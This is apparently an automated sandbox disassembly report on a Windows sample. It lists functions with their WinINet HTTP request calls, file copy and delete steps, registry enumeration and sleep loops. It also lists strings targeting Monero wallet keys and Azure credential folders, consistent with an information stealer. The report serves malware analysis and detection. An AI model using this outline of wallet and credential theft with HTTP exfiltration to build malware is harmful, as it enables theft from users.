Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: c2ee8935c4ee22c908f9f043cc47084e66249a47f90aae79672b14f1a5e771ba
Instruction ID: 619ccda3d7cd4c495924317ca26487eba687ba37be9428d93e3ff6bbdb873989
Opcode Fuzzy Hash: c2ee8935c4ee22c908f9f043cc47084e66249a47f90aae79672b14f1a5e771ba
Instruction Fuzzy Hash: AD120071A50108ABDB14FBA0DDA6EEE7378BF16301F504159F507B6492DF34AE0ACB62

Function 000A5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Part of subcall function 000A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000A4839
Part of subcall function 000A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000A4849

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000A59F8
StrCmpCA.SHLWAPI(?,0139F5E0), ref: 000A5A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000A5B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0139F570,00000000,?,01399918,00000000,?,000C1A1C), ref: 000A5E71
lstrlen.KERNEL32(00000000), ref: 000A5E82
GetProcessHeap.KERNEL32(00000000,?), ref: 000A5E93
RtlAllocateHeap.NTDLL(00000000), ref: 000A5E9A
lstrlen.KERNEL32(00000000), ref: 000A5EAF
lstrlen.KERNEL32(00000000), ref: 000A5ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000A5EF1
lstrlen.KERNEL32(00000000,?,?), ref: 000A5F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000A5F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 000A5F4C
InternetCloseHandle.WININET(00000000), ref: 000A5FB0
InternetCloseHandle.WININET(00000000), ref: 000A5FBD
HttpOpenRequestA.WININET(00000000,0139F6B0,?,0139ECE8,00000000,00000000,00400100,00000000), ref: 000A5BF8

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

InternetCloseHandle.WININET(00000000), ref: 000A5FC7

Strings

------, xrefs: 000A5C0B
------, xrefs: 000A5D4C
------, xrefs: 000A5A96
", xrefs: 000A5E16
", xrefs: 000A5CD5

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 43b0c5335ad2fa36aa7be2940b48ee5a27c37cd86ced44db65c0048b170a2e1c
Instruction ID: 439d727ee8f5fd82ffb8c32a7757148391484e73192761a908ec746884f3f753
Opcode Fuzzy Hash: 43b0c5335ad2fa36aa7be2940b48ee5a27c37cd86ced44db65c0048b170a2e1c
Instruction Fuzzy Hash: 8412FD71A20118BBDB15EBA0DC95FEEB378BF15700F5041A9F10676492EF702A4ACF66

Function 000ACEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Part of subcall function 000B8B60: GetSystemTime.KERNEL32(000C0E1A,01399EE8,000C05AE,?,?,000A13F9,?,0000001A,000C0E1A,00000000,?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000B8B86

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000ACF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000AD0C7
RtlAllocateHeap.NTDLL(00000000), ref: 000AD0CE
lstrcat.KERNEL32(?,00000000), ref: 000AD208
lstrcat.KERNEL32(?,000C1478), ref: 000AD217
lstrcat.KERNEL32(?,00000000), ref: 000AD22A
lstrcat.KERNEL32(?,000C147C), ref: 000AD239
lstrcat.KERNEL32(?,00000000), ref: 000AD24C
lstrcat.KERNEL32(?,000C1480), ref: 000AD25B
lstrcat.KERNEL32(?,00000000), ref: 000AD26E
lstrcat.KERNEL32(?,000C1484), ref: 000AD27D
lstrcat.KERNEL32(?,00000000), ref: 000AD290
lstrcat.KERNEL32(?,000C1488), ref: 000AD29F
lstrcat.KERNEL32(?,00000000), ref: 000AD2B2
lstrcat.KERNEL32(?,000C148C), ref: 000AD2C1
lstrcat.KERNEL32(?,00000000), ref: 000AD2D4
lstrcat.KERNEL32(?,000C1490), ref: 000AD2E3

Part of subcall function 000BA820: lstrlen.KERNEL32(000A4F05,?,?,000A4F05,000C0DDE), ref: 000BA82B
Part of subcall function 000BA820: lstrcpy.KERNEL32(000C0DDE,00000000), ref: 000BA885

lstrlen.KERNEL32(?), ref: 000AD32A
lstrlen.KERNEL32(?), ref: 000AD339

Part of subcall function 000BAA70: StrCmpCA.SHLWAPI(013989D0,000AA7A7,?,000AA7A7,013989D0), ref: 000BAA8F

DeleteFileA.KERNEL32(00000000), ref: 000AD3B4

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: cd39b3e57716376090b9d0dec169a5267cce7e910689df7b09ef43c1be24dd52
Instruction ID: 4ba8c5576941111668fec9558514bb7e7a2ccb995da568a25f519d3b535cf288
Opcode Fuzzy Hash: cd39b3e57716376090b9d0dec169a5267cce7e910689df7b09ef43c1be24dd52
Instruction Fuzzy Hash: 88E1FC71A50108ABDB14EBA0ED9AEEE7378BF15301F104159F107BA592DF35BE09CB62

Function 000A6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Part of subcall function 000A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000A4839
Part of subcall function 000A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000A4849

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

InternetOpenA.WININET(000C0DFE,00000001,00000000,00000000,00000000), ref: 000A62E1
StrCmpCA.SHLWAPI(?,0139F5E0), ref: 000A6303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000A6335
HttpOpenRequestA.WININET(00000000,GET,?,0139ECE8,00000000,00000000,00400100,00000000), ref: 000A6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000A63BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000A63D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 000A63FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000A646D
InternetCloseHandle.WININET(00000000), ref: 000A64EF
InternetCloseHandle.WININET(00000000), ref: 000A64F9
InternetCloseHandle.WININET(00000000), ref: 000A6503

Strings

GET, xrefs: 000A637C
ERROR, xrefs: 000A6407
ERROR, xrefs: 000A64C9

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 90e61371a28def5f91b17d1eb36ec2ae9b86c2d289a9819569db4cb330a8f92b
Instruction ID: 086db8c885f8521aedf45efd0ab124a7d1259e7b957ea469bc9a0f3de63f6854
Opcode Fuzzy Hash: 90e61371a28def5f91b17d1eb36ec2ae9b86c2d289a9819569db4cb330a8f92b
Instruction Fuzzy Hash: D4715F71A40218ABDB24DFE0DC99FEEB7B8FB49700F108158F10A6B191DBB56A85CF51

Function 000B5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA820: lstrlen.KERNEL32(000A4F05,?,?,000A4F05,000C0DDE), ref: 000BA82B
Part of subcall function 000BA820: lstrcpy.KERNEL32(000C0DDE,00000000), ref: 000BA885

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000B5644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000B56A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000B5857

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Part of subcall function 000B51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000B5228

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Part of subcall function 000B52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000B5318
Part of subcall function 000B52C0: lstrlen.KERNEL32(00000000), ref: 000B532F
Part of subcall function 000B52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 000B5364
Part of subcall function 000B52C0: lstrlen.KERNEL32(00000000), ref: 000B5383
Part of subcall function 000B52C0: lstrlen.KERNEL32(00000000), ref: 000B53AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000B578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000B5940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000B5A0C
Sleep.KERNEL32(0000EA60), ref: 000B5A1B

Strings

ERROR, xrefs: 000B5693
ERROR, xrefs: 000B577D
ERROR, xrefs: 000B5636
ERROR, xrefs: 000B59FE
ERROR, xrefs: 000B5932
ERROR, xrefs: 000B5849

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 768e0802b1c784e75bbccb9cdf8406ee88245ef9b1a6ec3668f95abefddae3ea
Instruction ID: 419d96a7f501f7876f0fe4dfeaa44004247af338f660ad726cf07beac6fcdca3
Opcode Fuzzy Hash: 768e0802b1c784e75bbccb9cdf8406ee88245ef9b1a6ec3668f95abefddae3ea
Instruction Fuzzy Hash: 45E10071A50608AACB14FBB0EC96EED737CAF55300F508568B50666593EF346F0DCBA2

Function 000B8320 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

RegOpenKeyExA.KERNEL32(00000000,0139AEC0,00000000,00020019,00000000,000C05B6), ref: 000B83A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000B8426
wsprintfA.USER32 ref: 000B8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 000B847B
RegCloseKey.ADVAPI32(00000000), ref: 000B848C
RegCloseKey.ADVAPI32(00000000), ref: 000B8499

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Strings

%s\%s, xrefs: 000B844D
- , xrefs: 000B85A3

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s
API String ID: 3246050789-1643714437
Opcode ID: a7a0da7e2741c9bf9a75ab90e375d6e31e55ed4dd828f30920e8d8479a6bc512
Instruction ID: d724bb9eef71c09a7fa077c7762ac3a7e11bf85ce6200f2da192c40bb89b2644
Opcode Fuzzy Hash: a7a0da7e2741c9bf9a75ab90e375d6e31e55ed4dd828f30920e8d8479a6bc512
Instruction Fuzzy Hash: 32810871950118ABEB28DB54DC95FEEB7B8FF08700F408299E109A6191DF716F89CFA1

Function 000B4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000B8E0B

lstrcat.KERNEL32(?,00000000), ref: 000B4DB0
lstrcat.KERNEL32(?,\.azure\), ref: 000B4DCD

Part of subcall function 000B4910: wsprintfA.USER32 ref: 000B492C
